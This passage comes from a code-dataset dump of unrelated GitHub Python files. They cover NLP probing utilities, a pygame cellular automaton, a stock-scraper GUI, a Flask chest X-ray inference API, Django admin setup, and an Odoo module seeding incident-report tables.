the_input = the_input.unsqueeze(0)\n result = model(the_input)[0]\n result = result.squeeze(0)\n final_repr = []\n \n i = 0\n for size in sizes:\n to_append = torch.mean(result[i:i+size], dim=0)\n final_repr.append(to_append)\n i += size\n \n assert len(final_repr) == len(sentence_words), \"Something is wrong\"\n sentences_result.append(torch.stack(final_repr).squeeze(1))\n print(\"WTH\")\n if concat:\n #for s in sentences_result:\n yes = torch.cat([s for s in sentences_result], dim=0)\n if get_pos: return yes, torch.tensor(pos_result), global_words\n return yes\n \n # Assume concat means structural probe, means no pos\n return [s for s in sentences_result] #, global_words\n\n\n# I provide the following sanity 
check, that compares your representations against a pickled version of mine.\n# Note that I use the DistilGPT-2 LM here. For the LSTM I used 0-valued initial states.\ndef assert_sen_reps(transformer, tokenizer, lstm, vocab):\n    with open('distilgpt2_emb1.pickle', 'rb') as f:\n        distilgpt2_emb1 = pickle.load(f)\n\n    with open('lstm_emb1.pickle', 'rb') as f:\n        lstm_emb1 = pickle.load(f)\n    \n    corpus = parse_corpus('data/sample/en_ewt-ud-train.conllu')[:1]\n\n    own_distilgpt2_emb1 = fetch_sen_reps(corpus, transformer, tokenizer)\n    own_lstm_emb1 = fetch_sen_reps(corpus, lstm, vocab)\n    print(distilgpt2_emb1.shape, own_distilgpt2_emb1.shape)\n    \n    assert distilgpt2_emb1.shape == own_distilgpt2_emb1.shape\n    assert lstm_emb1.shape == own_lstm_emb1.shape\n    assert torch.allclose(distilgpt2_emb1, own_distilgpt2_emb1,atol=1e-05), \"GPT2 embeddings don't match!\"\n    assert torch.allclose(lstm_emb1, own_lstm_emb1,atol=1e-05), \"LSTM embeddings don't match!\"\n\n    print(\"All is well!\")\n\ndef create_data(filename: str, lm, w2i, pos_vocab=None, cutoff=None, shuffled=False):\n    \"\"\"Create whole dataset \"\"\"\n    global pos_w2i\n    ud_parses = parse_corpus(filename)[:cutoff]\n    print(\"Creating data for\", len(ud_parses))\n    sen_reps, pos_tags, global_words = fetch_sen_reps(ud_parses, lm, w2i, concat=True, get_pos=True, shuffled=shuffled)\n    print(\"Done sen reps\")\n    pos_vocab = pos_w2i\n\n    return sen_reps, pos_tags, pos_vocab, global_words\n\ndef create_or_load_pos_data(set_type:str, lm, w2i, pos_vocab=None, cutoff=None, extra_transformer = None, shuffled=False):\n    \"\"\"\n    Args:\n        set_type: (train,dev,test)\n        lm: language model to use\n        w2i: corresponding tokenizer/dictionary\n        pos_vocab: existing pos_vocab object, set to None for the very first set you load\n    Returns:\n        x,y: Tensors of size pos_length*repr_size and pos_length\n        vocab: vocab to use for the next iteration if first time saving, None otherwise\n        words: all words to use for control task\n    \"\"\"\n    # Remember original set type, may be overwritten with additional transformer information\n    original_set_type = set_type\n    model_name = 'RNN' if type(lm) == RNNModel or extra_transformer=='RNN' else 'transformer'\n    if extra_transformer == 'BART':\n        #model_name += 'BART'\n        set_type += '_BART'\n    if extra_transformer == 'XLNet':\n        #model_name += 'XLNet'\n        set_type += '_XLNet'\n    if extra_transformer == 'T5':\n        #model_name += 'T5'\n        set_type += '_T5'\n    if extra_transformer == 'TransformerXL':\n        #model_name += 'TransformerXL'\n        set_type += '_TransformerXL'\n\n    if shuffled:\n        set_type += \"_shuffled\"\n    save_filename = os.path.join('corpus', model_name + '_pos'+set_type+'.pickle')\n    words_filename = os.path.join('words', set_type+'.pickle')\n    print(\"USING SAVE\", save_filename)\n    if os.path.exists(save_filename):\n        with open(save_filename, \"rb\") as f: \n            l = pickle.load(f)\n        #with open(words_filename, \"rb\") as f:\n        #    words = pickle.load(f)\n        return l['x'], l['y'], None, None #words\n\n    # If not exists\n    set_type = original_set_type\n    x,y,vocab,words = create_data(\n        os.path.join('data', 'en_ewt-ud-'+set_type+'.conllu'),\n        lm, \n        w2i,\n        pos_vocab,\n        cutoff, \n        shuffled\n    )\n\n    print(\"Data created. 
Pickling now\")\n\n # Pickle corpus and true y-labels\n if not os.path.exists(\"corpus\"):\n os.makedirs(\"corpus\")\n with open(save_filename, \"wb\") as f:\n pickle.dump({\"x\":x, \"y\":y}, f)\n\n # Pickle words for control task\n if not os.path.exists(\"words\"):\n os.makedirs(\"words\") \n with open(words_filename,\"wb\") as fp: \n pickle.dump(words, fp)\n\n return x,y,vocab,words","repo_name":"annaproxy/nlp2-probing-lms","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"91"}
+{"seq_id":"2935594157","text":"import random\nimport sys\n\nimport pygame\n\nfrom src import colors\nfrom src.utils import cur_time\nfrom src.algorithms import IAutomatonAlgorithm\n\n\nclass AliveCell:\n def __init__(self, x, y, color):\n self.x = x\n self.y = y\n self.color = color\n\n @property\n def key(self):\n return self.x, self.y\n\n def __repr__(self):\n return f'AliveCell({self.x}, {self.y})'\n\n def __str__(self):\n return f'AliveCell({self.x}, {self.y})'\n\n\nclass Automaton:\n _screen = None\n _next_fps_tick = 0\n _automaton_algorithm = None\n _algorithm_started = False\n\n def __init__(self, screen_size=None, cell_count=100, max_fps=60):\n self._screen_size = screen_size or [1280, 720]\n self._screen_ratio = self._screen_size[0] / self._screen_size[1]\n self._max_fps = max_fps\n self._fps_cooldown = 1 / max_fps * 1000\n\n self._cell_count = cell_count\n self._cell_limits = self._calculate_dimension_limits()\n self._cell_sizes = self._calculate_cell_sizes()\n self._map = {}\n\n def _calculate_cell_sizes(self):\n width = int(self._screen_size[0] / self._cell_limits[0])\n height = int(self._screen_size[1] / self._cell_limits[1])\n return max(width, 1), max(height, 1)\n\n def _calculate_dimension_limits(self):\n \"\"\"\n y*ratio + height = cell_count ---> y = cell_count / (ratio + 1)\n \"\"\"\n y_cells_count = int(self._cell_count / (self._screen_ratio + 1))\n x_cells_count = self._cell_count - y_cells_count\n return x_cells_count, y_cells_count\n\n def init_pygame(self):\n pygame.init()\n self._screen = pygame.display.set_mode(self._screen_size)\n\n def set_algorithm(self, algorithm: IAutomatonAlgorithm):\n self._automaton_algorithm = algorithm\n\n def start(self):\n while True:\n self._cpu_tick()\n if cur_time() <= self._next_fps_tick:\n continue\n self._next_fps_tick = cur_time() + self._fps_cooldown\n self._fps_tick()\n\n def _cpu_tick(self):\n self._handle_exit_event()\n self._handle_keyboard()\n self._handle_mouse()\n\n def _fps_tick(self):\n self._screen.fill(colors.BLACK)\n if self._automaton_algorithm and self._algorithm_started:\n self._automaton_algorithm.automata_tick(self)\n self._draw_alive_cells()\n pygame.display.flip()\n\n def _handle_exit_event(self):\n quit_events = pygame.event.get(eventtype=pygame.QUIT)\n if len(quit_events) > 0:\n sys.exit()\n\n def _handle_keyboard(self):\n for event in pygame.event.get(eventtype=pygame.KEYDOWN):\n if event.key == pygame.K_ESCAPE:\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._algorithm_started = not self._algorithm_started\n\n def _handle_mouse(self):\n mouse_events = [\n *pygame.event.get(eventtype=pygame.MOUSEMOTION),\n *pygame.event.get(eventtype=pygame.MOUSEBUTTONDOWN),\n ]\n if len(mouse_events) == 0:\n return\n add, _, remove = pygame.mouse.get_pressed(num_buttons=3)\n if not any([add, remove]):\n return\n\n pos = pygame.mouse.get_pos()\n cell_x, cell_y = int(pos[0] / self._cell_sizes[0]), int(pos[1] / self._cell_sizes[1])\n\n if add:\n self._alive_cell(cell_x, cell_y)\n elif remove:\n self._kill_cell(cell_x, cell_y)\n\n def _get_cell(self, x, y):\n return self._map.get((x, y))\n\n def _set_cell(self, x, y, cell):\n key = (x, y)\n if not cell:\n del self._map[key]\n else:\n self._map[key] = cell\n\n def _is_alive(self, x, y):\n return self._get_cell(x, y)\n\n def _in_limits(self, x, y):\n return (\n 0 <= x < self._cell_limits[0] and\n 0 <= y < self._cell_limits[1]\n )\n\n def _alive_cell(self, x, y):\n if self._is_alive(x, y) or not self._in_limits(x, y):\n return\n\n color = 
colors.RANDOM_NEAR(colors.AZURE)\n alive_cell = AliveCell(x, y, color)\n self._set_cell(x, y, alive_cell)\n\n def _kill_cell(self, x, y):\n if not self._is_alive(x, y) or not self._in_limits(x, y):\n return\n\n self._set_cell(x, y, None)\n\n def _draw_alive_cells(self):\n for cell in self._map.values():\n self._draw_cell(cell)\n\n def _draw_cell(self, cell: AliveCell):\n start = cell.x * self._cell_sizes[0], cell.y * self._cell_sizes[1]\n pygame.draw.rect(self._screen, cell.color, pygame.Rect(*start, self._cell_sizes[0], self._cell_sizes[1]))\n\n\n","repo_name":"StalkerRaftik/CellularAutomata","sub_path":"src/automaton.py","file_name":"automaton.py","file_ext":"py","file_size_in_byte":4676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70257711665","text":"# las condiciones nos permiten realizar una accion si estas se cumplen o realizar otra si no lo hacen\n# se escriben, if condicion: accion a relizar si se cumple else: accion a realizar si no se cumple\na = 1\nb = 1\n\nif a < b:\n print(\"A es menor que B\")\nelif a == b:\n print(\"A es igual a B\")\nelse:\n print(\"A es mayor que B\")\n\n\n# no solo sirven para comparar\nc = False\n\nif c:\n print(\"C es verdadero\")\nelse:\n print(\"C es falso\")\n\n\n# se puede usar is en ocasiones, para comparar\nd = True\n\nif type(d) is bool:\n print(\"D es booleano\")\nelse:\n print(\"D es otro tipo de dato\")\n\n\n# se ocupa and para que se cumplan varias condiciones\ne = 10\nf = 5\ng = 1\n\nif e > f and f > g:\n print(\"Las 2 condiciones son verdaderas\")\n\n\n# se ocupa or para validar si al menos una de las condicones se cumple\nh = 9\ni = 1\nj = 4\n\nif h > j or j == i:\n print(\"Una de las condicones se cumplio\")","repo_name":"Aokrams/Python-basico","sub_path":"condiciones.py","file_name":"condiciones.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"22964069776","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# アニメ顔分類器\n# https://github.com/nagadomi/lbpcascade_animeface\n# 動画で検出サンプル\n# http://www.takunoko.com/blog/python%E3%81%A7%E9%81%8A%E3%82%93%E3%81%A7%E3%81%BF%E3%82%8B-part1-opencv%E3%81%A7%E9%A1%94%E8%AA%8D%E8%AD%98/\n\n\nimport cv2\nfrom functions import check_img, is_front_face, get_alphachannel, fill_void, is_skin, get_hair_color_hsv\nfrom frame_manager import FacesManager\nfrom aikatsu_charactors_detection import detect_aikatsu_charactors, AIKATSU_NAMES\n\nCASCADE_PATH = \"./cascade/lbpcascade_animeface.xml\"\n# IN_VIDEO_PATH = \"./test_imgs/nanohaAs_promotion_video.mp4\"\nIN_VIDEO_PATH = \"./test_imgs/hirari-hitori-kirari.mp4\"\n# IN_VIDEO_PATH = \"./test_imgs/aikatsu_calendargirl_edited.mp4\"\n# IN_VIDEO_PATH = \"./test_imgs/calendargirl_short.mp4\"\nOUT_VIDEO_PATH = \"./test_imgs/output.avi\"\nOVERLAY_IMG_PATH = \"./test_imgs/face_up3.jpg\"\nFRAME_SIZE = (1920, 1080)\nFPS = 30.0\nCHECK_IMG_FLAG = False\n\nOVERLAY_IMG_MAP = {\n AIKATSU_NAMES[0]: cv2.imread(\"./test_imgs/overlays/murata.jpg\", -1),\n AIKATSU_NAMES[1]: cv2.imread(\"./test_imgs/overlays/ambe.jpg\", -1),\n AIKATSU_NAMES[2]: cv2.imread(\"./test_imgs/overlays/kon.jpg\", -1),\n AIKATSU_NAMES[3]: cv2.imread(\"./test_imgs/overlays/matsuno.jpg\", -1),\n AIKATSU_NAMES[4]: cv2.imread(\"./test_imgs/overlays/fukushima.jpg\", -1),\n AIKATSU_NAMES[5]: cv2.imread(\"./test_imgs/overlays/kato.jpg\", -1),\n AIKATSU_NAMES[6]: cv2.imread(\"./test_imgs/overlays/konishi.jpg\", -1),\n AIKATSU_NAMES[7]: cv2.imread(\"./test_imgs/overlays/ota.jpg\", -1)\n}\n\n\ndef switch_overlay_img(face_img):\n # name, hsv = detect_aikatsu_charactors['anime_based']['bgr_diff'](get_hair_color_hsv(face_img))\n # return OVERLAY_IMG_MAP[name]\n return OVERLAY_IMG_MAP[AIKATSU_NAMES[0]]\n\n\ndef overlay(faces, rgb_img, cascade):\n if len(faces) <= 0:\n return rgb_img\n\n for (x, y, w, h) in faces:\n face_img = rgb_img[y:y + h, x:x + w]\n # if w < 40:\n # continue\n if not is_skin(face_img):\n continue\n\n overlay_img = switch_overlay_img(face_img)\n resized_overlay_img = cv2.resize(overlay_img, tuple((w, h)))\n # alpha_channel = fill_void(get_alphachannel(face_img))\n # mask_img = cv2.bitwise_and(resized_overlay_img, resized_overlay_img,\n # mask=alpha_channel)\n mask_img = overlay_img\n for i, j in [(i, j) for i in range(h) for j in range(w)]:\n if any(mask_img[i, j]):\n rgb_img[y + i, x + j] = mask_img[i, j]\n\n return rgb_img\n\n\n# --------------------------------------------\nif __name__ == '__main__':\n\n cascade = cv2.CascadeClassifier(CASCADE_PATH)\n\n cap = cv2.VideoCapture(IN_VIDEO_PATH)\n out = cv2.VideoWriter(filename=OUT_VIDEO_PATH, fourcc=0,\n fps=FPS, frameSize=FRAME_SIZE)\n frame_idx = 0\n faces_mgr = FacesManager()\n\n try:\n while cap.isOpened():\n frame_idx += 1\n if frame_idx % 50 == 0:\n print(\"frame : %d\" % frame_idx)\n\n ret, frame = cap.read()\n # if ret is False:\n # print('false')\n # out.write(frame)\n # continue\n faces = cascade.detectMultiScale(cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY),\n scaleFactor=1.1, minNeighbors=1, minSize=(1, 1))\n # if frame_idx == 1:\n # faces_mgr.initialize(frame, faces)\n # continue\n\n # frame, faces = faces_mgr.append(frame, faces).get()\n overlayed_frame = overlay(faces, frame, cascade)\n out.write(overlayed_frame)\n\n # frame, faces = faces_mgr.get()\n # frame, faces = faces_mgr.append(frame, faces).get()\n # overlayed_frame = overlay(faces, frame, cascade)\n # out.write(overlayed_frame)\n except:\n pass\n else:\n 
cap.release()\n cv2.destroyAllWindows()\n out.release()\n","repo_name":"mu-777/image_processing_tests","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4001,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9710076542","text":"from cgitb import enable\nfrom tkinter import *\nfrom WebScraper import getStockPriceDict, scrapeStockPrice\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nimport pandas as pd\n\nglobal stockPriceHistory\nstockPriceHistory = []\nglobal counter\ncounter = [0]\n\ndef clickFunc():\n global stock\n stock = entry.get()\n\n if(stock != \"\"):\n global newLabel\n stockPrice = scrapeStockPrice(stock)\n stockPriceHistory.append(stockPrice)\n if(stockPrice == \"-1\"):\n newLabel = Label(root, text=\"INVALID STOCK TICKER\", font=(\"Courier\", 12))\n newLabel.pack()\n newButton['state'] = DISABLED\n return\n newLabel = Label(root, text=\"The price of \" + stock + \" is $\" + stockPrice, font=(\"Courier\", 12))\n newLabel.pack()\n newButton['state'] = DISABLED\n\ndef deleteStock():\n newLabel.destroy()\n newButton['state'] = ACTIVE\n stockPriceHistory.clear()\n return\n\ndef animateGraph(i):\n print(\"counter \" + str(counter))\n print(\"history \" + str(stockPriceHistory))\n\n plt.cla()\n plt.plot(counter, stockPriceHistory)\n\n counter.append(counter[-1] + 20)\n stockPriceHistory.append(float(scrapeStockPrice(stock)))\n return\n\ndef startGraph():\n plt.style.use('fivethirtyeight')\n plt.tight_layout()\n ani = FuncAnimation(plt.gcf(), animateGraph, interval = 20000)\n \n plt.show()\n return\n\nroot = Tk(className=\"StockWebScraper\")\nroot.geometry(\"300x300\")\nroot.resizable(width=False, height=False)\n\n\nentry = Entry(root, width=\"30\")\nentry.insert(0, \"Ex. AMD, MSFT, SPY...\")\nentry.pack()\n\nnewButton = Button(root, text=\"Add stock ticker\", pady=\"20\", padx=\"30\", command=clickFunc)\nnewButton.pack()\n\ndeleteButton = Button(root, text=\"Remove stock ticker\", pady=\"20\", padx=\"30\", command=deleteStock)\ndeleteButton.pack()\n\ngraphButton = Button(root, text=\"Graph current stock\", pady=\"20\", padx=\"30\", command=startGraph)\ngraphButton.pack()\n\n\nroot.mainloop()","repo_name":"BWS3000/PyStockScraper","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"30909641140","text":"#\n# @lc app=leetcode.cn id=124 lang=python3\n#\n# [124] 二叉树中的最大路径和\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\n\"\"\" \n后序遍历\nAccepted\n94/94 cases passed (68 ms)\nYour runtime beats 94.12 % of python3 submissions\nYour memory usage beats 20.1 % of python3 submissions (22.5 MB)\n\"\"\"\n\n\nclass Solution:\n def maxPathSum(self, root: Optional[TreeNode]) -> int:\n res = float('-inf')\n\n def handler(node):\n left, right = 0, 0\n if node.left:\n left = max(handler(node.left), 0)\n if node.right:\n right = max(handler(node.right), 0)\n nonlocal res\n res = max(res, left + right + node.val)\n return max(left, right) + node.val\n\n handler(root)\n\n return int(res)\n# @lc code=end\n","repo_name":"slybootslion/LeetCodeExercise","sub_path":"Python3/124.二叉树中的最大路径和.py","file_name":"124.二叉树中的最大路径和.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"16598009930","text":"import joblib\nimport pandas as pd\nfrom fastapi.encoders import jsonable_encoder\n\nfrom src import params\n\n\ndef construct_df(input):\n df = pd.DataFrame(jsonable_encoder(input))\n df = df.set_axis([\n 'Patient Age at Treatment',\n 'Total Number of Previous IVF cycles',\n 'Total number of IVF pregnancies',\n 'Total number of live births - conceived through IVF',\n 'Type of Infertility - Female Primary',\n 'Type of Infertility - Female Secondary',\n 'Type of Infertility - Male Primary',\n 'Type of Infertility - Male Secondary',\n 'Type of Infertility -Couple Primary',\n 'Type of Infertility -Couple Secondary',\n 'Cause of Infertility - Tubal disease',\n 'Cause of Infertility - Ovulatory Disorder',\n 'Cause of Infertility - Male Factor',\n 'Cause of Infertility - Patient Unexplained',\n 'Cause of Infertility - Endometriosis',\n 'Cause of Infertility - Cervical factors',\n 'Cause of Infertility - Partner Sperm Concentration',\n 'Cause of Infertility - Partner Sperm Morphology',\n 'Causes of Infertility - Partner Sperm Motility',\n 'Fresh Cycle',\n 'Frozen Cycle',\n 'Eggs Thawed',\n 'Fresh Eggs Collected',\n 'Eggs Mixed With Partner Sperm',\n 'Embryos Transfered'\n ], axis=1, inplace=False)\n\n return df\n\n\ndef predict(input):\n model = joblib.load(f'./{params.model}')\n\n x_input = construct_df(input)\n y_predicted = model.predict(x_input)\n\n return y_predicted\n","repo_name":"zain3ie/pm_dev","sub_path":"src/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"29671644038","text":"# app.py\n# author:Ren\n# Date: 20211001\nimport json\nfrom flask import Flask, jsonify, request\nfrom tensorflow.keras.models import load_model\nfrom inference import chest_inference\napp = Flask(__name__)\n\n\n\n@app.route('/predict', methods = ['POST'])\ndef predict():\n json_data = request.get_json() #Get the POSTed json\n dict_data = json.loads(json_data)\n img_str = dict_data['img_str']\n result = chest_inference(img_str, tube_model_pred, pneumo_model_pred)\n return jsonify(result)\n\nif __name__ == \"__main__\":\n # parameters\n tube_weight_path = \"./weights/tube/06_chest_npz_aug10_zero2one_512x512_valWOaug_clahe_centercrop/checkpoint-20-0.985-0.040.h5\"\n pneumo_weight_path = \"./weights/pneumo/01_pneumo_npz_aug10_normalize1024_512x512_valWOaug_densenet/checkpoint-24-0.951-0.247.h5\"\n # load tube model\n tube_model_pred = load_model(tube_weight_path)\n # load pneumo model\n pneumo_model_pred = load_model(pneumo_weight_path)\n app.run(host = \"0.0.0.0\", port = 8080)\n","repo_name":"superRenh/2021aigo_chestxray","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"1854292001","text":"from django.contrib import admin\nfrom .models import Artist, Album, Track, Blog\n\n\nclass AlbumInline(admin.TabularInline):\n model = Album\n extra = 1\n\n\nclass TrackInline(admin.TabularInline):\n model = Track\n extra = 1\n\n\nclass ArtistAdmin(admin.ModelAdmin):\n fieldsets = [\n ('Images', {'fields': ['artist_picture']}),\n ('Artist Information', {'fields': ['artist_name']}),\n ]\n inlines = [AlbumInline]\n\n\nclass AlbumAdmin(admin.ModelAdmin):\n fieldsets = [\n ('Images', {'fields': ['album_cover']}),\n ('Album Information', {'fields': ['artist', 'album_name', 'album_genre',\n 'album_year', 'album_review']}),\n ]\n inlines = [TrackInline]\n\n\nclass TrackAdmin(admin.ModelAdmin):\n fields = ['track_number', 'track_title', 'youtube_link']\n\n\nclass BlogAdmin(admin.ModelAdmin):\n fields = ['blog_title', 'blog_date', 'blog_post']\n\nadmin.site.register(Artist, ArtistAdmin)\nadmin.site.register(Album, AlbumAdmin)\nadmin.site.register(Track, TrackAdmin)\nadmin.site.register(Blog, BlogAdmin)\n","repo_name":"shoshseiden/shoshs_musicbox","sub_path":"shoshs_musicbox/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"19069342430","text":"import os\nimport json\nfrom gensim.models import KeyedVectors\n\n\ndef input_fn(request_body, request_content_type):\n print(f\"request_body: {request_body}\")\n if request_content_type == \"application/json\":\n payload = json.loads(request_body)\n instances = payload[\"instances\"]\n return instances\n else:\n raise Exception(f\"{request_content_type} content type not supported\")\n\n\ndef predict_fn(instances, word_vectors):\n print(f\"instances: {instances}\")\n print(\"calling model\")\n predictions = word_vectors.most_similar(positive=instances)\n return predictions\n\n\ndef model_fn(model_dir):\n print(\"loading model from: {}\".format(model_dir))\n word_vectors = KeyedVectors.load_word2vec_format(os.path.join(model_dir, \"vectors.txt\"), binary=False)\n print(f'word vectors length: {len(word_vectors)}')\n return word_vectors\n","repo_name":"aws-samples/amazon-sagemaker-local-mode","sub_path":"gensim_with_word2vec_model_artifacts_local_serving/code/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":215,"dataset":"github-code","pt":"91"}
+{"seq_id":"32897314415","text":"from processing import inverse_scaling\nimport pandas as pd\n\nclass Persistence:\n def __init__(self, horizons):\n self.horizons = horizons\n\n def predict(self, test, scaler, index=None):\n persist = {}\n for h in range(1, self.horizons+1):\n persist[f't+{h}'] = inverse_scaling(test, scaler, h)\n persist = pd.DataFrame(data=persist)\n\n if index is not None:\n persist.index = index\n\n return persist","repo_name":"vitorp4/Data-Science","sub_path":"Regressão com MLP (serie temporal)/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9242269489","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import api, exceptions, fields, models, _\n\n\nclass add_is_criteres_generaux(models.TransientModel):\n _name = 'add.is.criteres.generaux'\n _description = u\"Initialisation Critères généraux\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.criteres.generaux']\n add_list = [\n [u'Evènement inhabituel par sa nature, son ampleur ou sa gravité', 1],\n [u'Evènement ayant pour conséquence une exclusion temporaire ou définitive', 2],\n [u'Evènement ayant pour conséquence une sanction disciplinaire grave ou une procédure judiciaire à l’encontre de personnels', 3],\n [u'Evènement nécessitant l’activation du Plan Bleu', 4],\n [u'Evènement nécessitant l’activation d’une CUMP', 5],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0], 'code': data[1]})\n return True\n\n\nclass add_is_demande_intervention_secours(models.TransientModel):\n _name = 'add.is.demande.intervention.secours'\n _description = u\"Initialisation Demande d’intervention des secours\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.demande.intervention.secours']\n add_list = [\n 'Pompiers',\n 'SAMU',\n 'Police',\n 'Gendarmerie',\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data)])\n if not generaux_ids:\n add_data_obj.create({'name': data})\n return True\n\n\nclass add_is_consequence_personne_prise_en_charge(models.TransientModel):\n _name = 'add.is.consequence.personne.prise.en.charge'\n _description = u\"Initialisation Conséquence pour la personne prises en charge\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.personne.prise.en.charge']\n add_list = [\n [u'décès', 1],\n ['mise en jeu du pronostic vital', 2],\n [u'probable déficit fonctionnel permanent', 3],\n ['soins internes', 4],\n ['hospitalisation', 5],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0],'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_is_consequence_personnel(models.TransientModel):\n _name = 'add.is.consequence.personnel'\n _description = u\"Initialisation Conséquence pour le personnel\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.personnel']\n add_list = [\n ['interruption temporaire de travail', 1],\n [u'réquisition', 2],\n ['autre (y compris suicide ou tentative de suicide)', 3],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_is_consequence_fonctionnement_stucture(models.TransientModel):\n _name = 'add.is.consequence.fonctionnement.stucture'\n _description = u\"Initialisation Conséquence pour l’organisation de la structure\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.consequence.fonctionnement.stucture']\n add_list = [\n [u'difficulté d’approvisionnement', 1],\n [u'difficulté d’accès à la structure ou au lieu de prise en charge', 2],\n [u'nécessité de déplacer des résidents', 3],\n [u'suspension d’activité', 4],\n [u\"intervention des forces de 
l’ordre ou des secours\", 5],\n [u'autre (à préciser)', 6],\n ]\n for data in add_list:\n generaux_ids = add_data_obj.search([('name', '=', data[0])])\n if not generaux_ids:\n add_data_obj.create({'name': data[0], 'code': data[1]})\n else:\n for c in generaux_ids:\n c.write({'name': data[0],'code': data[1]})\n return True\n\n\nclass add_toutes_tables(models.TransientModel):\n _name = 'add.toutes.tables'\n _description = u\"Initialisation de toutes les tables\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['add.is.criteres.generaux']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.demande.intervention.secours']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.personne.prise.en.charge']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.personnel']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.consequence.fonctionnement.stucture']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.nature.evenement']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.destinataire']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.qualite']\n add_data_obj.add_data()\n add_data_obj = self.env['add.is.qualite.autre']\n add_data_obj.add_data()\n return True\n\n\nclass add_is_type_evenement(models.TransientModel):\n _name = 'add.is.type.evenement'\n _description = u\"is.type.evenement\"\n\n @api.multi\n def add_data(self):\n add_data_obj = self.env['is.type.evenement']\n type_data1 = self.env.ref('is_eig12.is_type_evenement_1', False)\n type_data2 = self.env.ref('is_eig12.is_type_evenement_2', False)\n type_data3 = self.env.ref('is_eig12.is_type_evenement_3', False)\n type_data4 = self.env.ref('is_eig12.is_type_evenement_4', False)\n add_dict1 = {\n 'name': 'Situation exceptionnelle',\n 'description': u'Evènement ou dysfonctionnement grave pouvant affecter l’accompagnement des personnes accompagnées ou menacer leur santé, sécurité ou bien-être.',\n 'code': 'SE',\n }\n add_dict2 = {\n 'name': u'Information préoccupante',\n 'description': u'Information à la cellule départementale sur la situation d’un mineur ou d’une personne vulnérable, bénéficiant ou non d’un accompagnement, pouvant laisser craindre que sa santé, sa sécurité ou sa moralité sont en danger ou risque de l’être ou que les conditions de son éducation ou développement sont gravement compromises ou en risque de l’être.',\n 'code': 'IP',\n }\n add_dict3 = {\n 'name': u'Signalement au Procureur',\n 'description': u'Transmission à l’autorité judiciaire de l’ensemble des documents écrits concernant des faits graves, des éléments de danger avérés, compromettant le développement du mineur et sollicitant une mesure de protection judiciaire.',\n 'information_speciale': u\"Attention : l'applicatif n'envoie pas automatiquement un courrier aux autorités judiciaires. En cas de signalement aux autorités judiciaires, il est nécessaire d'imprimer le document pdf intitulé 'signalement' généré dans les 'pièces-jointes' de l'applicatif et de l'envoyer par fax à l'autorité judiciaire correspondante. 
